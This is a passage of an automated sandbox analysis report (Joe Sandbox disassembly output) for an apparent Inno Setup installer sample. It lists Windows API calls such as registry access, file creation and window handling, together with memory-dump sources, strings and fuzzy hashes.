                                                                                            • API String ID: 1959240892-1126107055
                                                                                            • Opcode ID: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
                                                                                            • Instruction ID: ec4a18813bd70517abb30b2059a031d9bbc12b7253ca3772a6f1eb51880190fd
                                                                                            • Opcode Fuzzy Hash: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
                                                                                            • Instruction Fuzzy Hash: 42015B75A04708BFD705CF6ADC1195ABBE9E78A720B22C87BEC04D36A0EB345814DE18
                                                                                            APIs
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047B346,00000000,0047B35C,?,?,?,?,00000000), ref: 0047B122
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID: RegisteredOrganization$RegisteredOwner
                                                                                            • API String ID: 3535843008-1113070880
                                                                                            • Opcode ID: e77b6468a0bbf668d644fb693f5a97652e08946f06f09772adc7615d771fa624
                                                                                            • Instruction ID: c0e5db093c22981a2c4b78a2736f8ddfc80e316131ebabe5fbae1d79ea558dad
                                                                                            • Opcode Fuzzy Hash: e77b6468a0bbf668d644fb693f5a97652e08946f06f09772adc7615d771fa624
                                                                                            • Instruction Fuzzy Hash: F1F0BB70708284ABEB00D675FD92BDB3359D742344F50807BA5149B391D7B99E01D79C
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 004741F1
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 00474208
                                                                                              • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateErrorFileHandleLast
                                                                                            • String ID: CreateFile
                                                                                            • API String ID: 2528220319-823142352
                                                                                            • Opcode ID: 285fe29be3b45c5d55921f03afc8078dc8cb5333e8f17a8fd5c0d1f978e05295
                                                                                            • Instruction ID: 58c46c97337ee3450255063b4db4f116026cd25e8145783c5652bdd163bde5c5
                                                                                            • Opcode Fuzzy Hash: 285fe29be3b45c5d55921f03afc8078dc8cb5333e8f17a8fd5c0d1f978e05295
                                                                                            • Instruction Fuzzy Hash: 78E06D342803447FEA10F769DCC6F5A7788AB04768F108152FA58AF3E3C6B9EC408618
                                                                                            APIs
                                                                                              • Part of subcall function 0045623C: CoInitialize.OLE32(00000000), ref: 00456242
                                                                                              • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                              • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                            • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                            • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                            • API String ID: 2906209438-2320870614
                                                                                            • Opcode ID: 5f0321f70bc8b65a0e9df3b83bb4349998e588e00924faa4de34c024f66de19b
                                                                                            • Instruction ID: 517aaa95fd919f42fec07b3e20ba2fe3b86c01757d5d2d7eeafb2f6c84d6a724
                                                                                            • Opcode Fuzzy Hash: 5f0321f70bc8b65a0e9df3b83bb4349998e588e00924faa4de34c024f66de19b
                                                                                            • Instruction Fuzzy Hash: 4CC040D074455095CA0077FB540374F14149750717F5180BFB848675C7DF3D440D566E
                                                                                            APIs
                                                                                              • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                              • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                            • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressErrorLibraryLoadModeProc
                                                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                            • API String ID: 2492108670-2683653824
                                                                                            • Opcode ID: b0d4ed7fe2e6c92240e78bd32e692da4caac8c34d98bb73dc912627f5a414994
                                                                                            • Instruction ID: f15142af1028fbda52646c9d138091dcd6bfc2c127db856ea005f68399f83491
                                                                                            • Opcode Fuzzy Hash: b0d4ed7fe2e6c92240e78bd32e692da4caac8c34d98bb73dc912627f5a414994
                                                                                            • Instruction Fuzzy Hash: 76B092A0B00780C6CE00BBB3A8127871528D740704B10C07F7240EA696FF7E8C458FEE
                                                                                            APIs
                                                                                            • GetSystemMenu.USER32(00000000,00000000,00000000,00480368), ref: 00480300
                                                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00480311
                                                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00480329
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Append$System
                                                                                            • String ID:
                                                                                            • API String ID: 1489644407-0
                                                                                            • Opcode ID: 07804b108b7a0fe67ba00d28aa87a6db0bb0739bb6f9f414250e392156e0bb43
                                                                                            • Instruction ID: 04a05a6f5988e1ad1c69e12ed442e821a58669dfeb252773ef60a283987a992a
                                                                                            • Opcode Fuzzy Hash: 07804b108b7a0fe67ba00d28aa87a6db0bb0739bb6f9f414250e392156e0bb43
                                                                                            • Instruction Fuzzy Hash: 3431B0707043441BD721FB769C8AB9E3A949B1531CF5408BBF800AA3D3CABC9C09879D
                                                                                            APIs
                                                                                            • 73A0A570.USER32(00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044AC55
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0044AC78
                                                                                            • 73A0A480.USER32(00000000,?,0044ACB8,00000000,0044ACB1,?,00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044ACAB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: A480A570ObjectSelect
                                                                                            • String ID:
                                                                                            • API String ID: 1230475511-0
                                                                                            • Opcode ID: ce16d757fc6e84d8b50fecd4ea510c6835f5a6497dcb8cdd06a43cc5d170f4e8
                                                                                            • Instruction ID: 3b5f26ead791ea6387a249f2cdaddc54e41ca9264cf2fbaff888b01415335cc3
                                                                                            • Opcode Fuzzy Hash: ce16d757fc6e84d8b50fecd4ea510c6835f5a6497dcb8cdd06a43cc5d170f4e8
                                                                                            • Instruction Fuzzy Hash: CA21B670E44248AFEB01DFA5C885B9F7BB9EB48304F41807AF500E7281D77C9950CB6A
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044A9A0,?,00480B97,?,?), ref: 0044A972
                                                                                            • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044A985
                                                                                            • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044A9B9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText$ByteCharMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 65125430-0
                                                                                            • Opcode ID: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
                                                                                            • Instruction ID: 8b0288b9d3461177b0e2011e4a6e3c0ecae8d00baf86e8e824f1a66b6306016d
                                                                                            • Opcode Fuzzy Hash: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
                                                                                            • Instruction Fuzzy Hash: 0E11B6B27446047FEB10DAAA9C82E6FB7ECEB49724F10417BF504E7290D6389E018669
                                                                                            APIs
                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
                                                                                            • TranslateMessage.USER32(?), ref: 0042449F
                                                                                            • DispatchMessageA.USER32(?), ref: 004244A9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$DispatchPeekTranslate
                                                                                            • String ID:
                                                                                            • API String ID: 4217535847-0
                                                                                            • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                            • Instruction ID: 520fb342982be2dd3794930026bb259c1cd38a4fe19eb968f01b3c53081bdda3
                                                                                            • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                            • Instruction Fuzzy Hash: 781191307043205AEE20FA64AD41B9B73D4DFD1708F80481EF9D997382D77D9E49879A
                                                                                            APIs
                                                                                            • SetPropA.USER32(00000000,00000000), ref: 0041667A
                                                                                            • SetPropA.USER32(00000000,00000000), ref: 0041668F
                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Prop$Window
                                                                                            • String ID:
                                                                                            • API String ID: 3363284559-0
                                                                                            • Opcode ID: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
                                                                                            • Instruction ID: 52b24e3238e4314aade48f96f4600562d70e15a3c995b5dbeb32d15e299d8853
                                                                                            • Opcode Fuzzy Hash: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
                                                                                            • Instruction Fuzzy Hash: 4CF0BD71701220ABEB10AB598C85FA632DCAB09715F16017ABE09EF286C678DC50C7A8
                                                                                            APIs
                                                                                            • IsWindowVisible.USER32(?), ref: 0041EE74
                                                                                            • IsWindowEnabled.USER32(?), ref: 0041EE7E
                                                                                            • EnableWindow.USER32(?,00000000), ref: 0041EEA4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$EnableEnabledVisible
                                                                                            • String ID:
                                                                                            • API String ID: 3234591441-0
                                                                                            • Opcode ID: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
                                                                                            • Instruction ID: 4e94e345e4a8e87798afb8fb42df504bf5387c41ee1a2ac16dc0d48b177cce37
                                                                                            • Opcode Fuzzy Hash: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
                                                                                            • Instruction Fuzzy Hash: 4DE0EDB8100304AAE750AB2BEC81A57769CBB55314F49843BAC099B293DA3ED8449A78
                                                                                            APIs
                                                                                            • SetActiveWindow.USER32(?), ref: 00480C2A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ActiveWindow
                                                                                            • String ID: InitializeWizard
                                                                                            • API String ID: 2558294473-2356795471
                                                                                            • Opcode ID: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
                                                                                            • Instruction ID: 7183a9f40d151cc4564f9c637f0f3a65215fdab84d47651bf6ef09736f3ca39c
                                                                                            • Opcode Fuzzy Hash: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
                                                                                            • Instruction Fuzzy Hash: C511C1302142049FD754EB6AFD82B0A7BA8E716728F10447BE810C77A1EB79AC64C79D
                                                                                            APIs
                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047B222,00000000,0047B35C), ref: 0047B021
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047AFF1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                            • API String ID: 47109696-1019749484
                                                                                            • Opcode ID: 3b78e152b17f15840806b4e47da0d6875f627c855d5fc6915719fd9d10737491
                                                                                            • Instruction ID: 32b1a4b4f3febb624688285ac2ab15cdeec5a734a0466c395ac52858640c886b
                                                                                            • Opcode Fuzzy Hash: 3b78e152b17f15840806b4e47da0d6875f627c855d5fc6915719fd9d10737491
                                                                                            • Instruction Fuzzy Hash: 7CF0E93170021467D700A55A6D02BAF528DCB80358F20407FF508EB342DABA9D06039C
                                                                                            APIs
                                                                                            • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F
                                                                                            Strings
                                                                                            • Inno Setup: Setup Version, xrefs: 0046DE8D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value
                                                                                            • String ID: Inno Setup: Setup Version
                                                                                            • API String ID: 3702945584-4166306022
                                                                                            • Opcode ID: 308a2d795db4d9f089db4d3a0d80863649b6fa39a5e40ce591918164ebf00fab
                                                                                            • Instruction ID: 3f565b73c41be68d18d1c675279a4c2ca8d62721aeaae2bfa6e8ff1167108c85
                                                                                            • Opcode Fuzzy Hash: 308a2d795db4d9f089db4d3a0d80863649b6fa39a5e40ce591918164ebf00fab
                                                                                            • Instruction Fuzzy Hash: 6AE06D717016043FD710AA2BDC85F6BBADCDF983A5F10403AB908EB392D578DD0081A8
                                                                                            APIs
                                                                                            • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046E544,?,?,00000000,0046E6DA,?,_is1,?), ref: 0046DEEF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value
                                                                                            • String ID: NoModify
                                                                                            • API String ID: 3702945584-1699962838
                                                                                            • Opcode ID: fcf48f294370718ea72f2974fc8c507718464dc9ad4e6ec171c14c9c323779b1
                                                                                            • Instruction ID: 16e32e904041cf2989cb5be4c2021f94977a521c7974260517dd4293f9cbe128
                                                                                            • Opcode Fuzzy Hash: fcf48f294370718ea72f2974fc8c507718464dc9ad4e6ec171c14c9c323779b1
                                                                                            • Instruction Fuzzy Hash: 64E04FB0A04304BFEB04EB55CD4AF6F77ACDB48754F104059BA089B291E674EE00C668
                                                                                            APIs
                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                            Strings
                                                                                            • System\CurrentControlSet\Control\Windows, xrefs: 0042DD5E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID: System\CurrentControlSet\Control\Windows
                                                                                            • API String ID: 71445658-1109719901
                                                                                            • Opcode ID: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
                                                                                            • Instruction ID: aea9d63627e202933d8ac4c6cad7c964b34c473e1f77024d29d81bfc1069fbec
                                                                                            • Opcode Fuzzy Hash: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
                                                                                            • Instruction Fuzzy Hash: 6FD09E72920128BB9B009A89DC41DF7775DDB19760F44401AF90497141C1B4AC5197E4
                                                                                            APIs
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000), ref: 0045384B
                                                                                            • FindClose.KERNEL32(000000FF,00453876,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000,00000001), ref: 00453869
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileNext
                                                                                            • String ID:
                                                                                            • API String ID: 2066263336-0
                                                                                            • Opcode ID: ce33a9adc91091840db89c3f0b9d0ab62a3048a172c241aa17054621e5542f77
                                                                                            • Instruction ID: 9ec0e3c397c6f5708f2a232916c112a37fe27e538a562d44e8698fe4f4711445
                                                                                            • Opcode Fuzzy Hash: ce33a9adc91091840db89c3f0b9d0ab62a3048a172c241aa17054621e5542f77
                                                                                            • Instruction Fuzzy Hash: AA81B37090424D9FCF11EF65C8417EFBBB4AF4934AF1480AAE84067392D3399B4ACB58
                                                                                            APIs
